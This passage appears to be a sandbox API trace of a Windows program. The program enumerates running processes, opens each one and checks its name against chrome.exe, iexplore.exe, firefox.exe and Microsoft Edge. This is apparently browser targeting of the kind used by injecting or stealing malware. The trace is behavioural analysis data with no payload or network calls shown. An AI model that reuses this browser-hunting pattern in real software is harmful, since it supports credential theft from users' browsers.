	[0205.067] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0205.068] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x2ad4
	[0205.068] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.068] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0205.069] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.069] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.069] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.069] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0205.069] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.069] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.069] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0205.070] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x2ad8
	[0205.070] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.070] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0205.071] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.071] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.071] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.071] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0205.071] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.071] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.071] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0205.072] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x2adc
	[0205.072] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.072] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0205.072] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.073] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.073] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.073] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0205.073] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.073] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.073] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0205.074] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x2ae0
	[0205.074] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.074] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0205.074] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.074] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.075] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.075] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0205.075] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.075] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.075] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0205.076] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x2ae4
	[0205.076] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.076] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0205.076] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.076] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.077] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.077] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0205.077] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.077] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.077] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0205.078] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x2ae8
	[0205.081] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.081] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0205.082] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.082] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.082] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.082] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0205.082] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.082] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.083] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0205.083] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x2aec
	[0205.083] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.083] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0205.084] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.084] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.084] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.084] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0205.084] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.084] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.085] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0205.085] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x2af0
	[0205.085] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.085] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0205.086] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.086] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.086] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.086] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0205.086] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.086] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.087] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0205.087] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x2af4
	[0205.087] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.087] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0205.088] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.088] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.088] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.088] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0205.088] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.088] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.088] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0205.089] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x2af8
	[0205.089] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.089] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0205.089] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.090] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.090] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.090] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0205.090] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.090] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.090] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0205.091] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x2afc
	[0205.091] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.091] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0205.091] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.091] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.092] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.092] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0205.092] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.092] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.092] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0205.093] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0205.093] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0205.094] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x2b00
	[0205.094] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.094] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0205.094] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.094] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.095] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.095] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0205.095] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.095] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.096] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0205.097] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x2b04
	[0205.097] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.097] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0205.097] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.097] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.097] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.097] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0205.098] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.098] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.098] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0205.098] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x2b08
	[0205.099] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.099] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0205.099] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.099] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.099] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.099] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0205.100] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.100] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.100] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0205.101] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x2b0c
	[0205.101] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.101] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0205.101] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.101] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.101] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.101] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0205.102] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.102] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.102] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0205.103] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x2b10
	[0205.103] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.103] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0205.103] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.103] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.104] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.104] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0205.104] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.104] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.105] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0205.105] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x2b14
	[0205.106] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.106] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0205.106] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.106] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.106] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.106] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0205.106] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.106] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.107] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0205.107] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x2b18
	[0205.107] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.107] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0205.108] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.108] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.108] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.108] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0205.109] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.109] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.109] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0205.110] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x2b1c
	[0205.110] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.110] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0205.110] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.110] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.111] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.111] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0205.111] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.111] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.112] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0205.112] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x2b20
	[0205.112] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.112] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0205.113] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.113] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.113] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.113] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0205.113] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.113] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.113] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0205.114] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x2b24
	[0205.114] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.114] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0205.114] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.114] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.115] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.115] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0205.115] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.115] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.115] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0205.116] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x2b28
	[0205.116] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.116] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0205.116] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.116] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.117] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.117] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0205.117] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.117] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.118] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0205.118] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x2b2c
	[0205.118] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.118] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0205.119] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.119] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.120] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.120] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0205.121] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.121] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.121] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0205.122] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x2b30
	[0205.122] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.122] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0205.123] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.123] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.123] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.123] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0205.124] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.124] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.124] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0205.125] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x2b34
